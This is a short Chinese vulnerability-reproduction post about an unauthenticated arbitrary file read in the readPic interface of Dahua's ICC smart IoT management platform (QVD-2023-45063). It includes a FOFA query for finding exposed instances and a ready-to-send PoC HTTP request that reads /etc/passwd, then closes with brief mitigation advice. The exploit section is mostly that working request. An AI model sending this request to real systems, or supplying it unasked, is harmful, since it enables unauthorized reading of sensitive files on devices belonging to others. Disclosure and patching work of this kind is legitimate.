大华智能物联综合管理平台 任意文件读取漏洞复现(QVD-2023-45063)

0x01 产品简介

大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。

0x02 漏洞概述

大华ICC智能物联综合管理平台 readpic接口处存在任意文件读取漏洞,未经身份验证的攻击者 可以获取系统内部敏感文件信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:body="客户端会小于800"

大华智能物联综合管理平台 任意文件读取漏洞复现(QVD-2023-45063)_第1张图片

0x04 漏洞复现

PoC

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

大华智能物联综合管理平台 任意文件读取漏洞复现(QVD-2023-45063)_第2张图片

0x05 修复建议 

目前已提供解决方案,请关注厂商主页更新:https://www.dahuatech.com/

临时修复方案:

通过防火墙等安全设备设置访问策略,设置白名单访问。

如非必要,禁止公网访问该系统。

你可能感兴趣的:(漏洞复现,web安全,安全)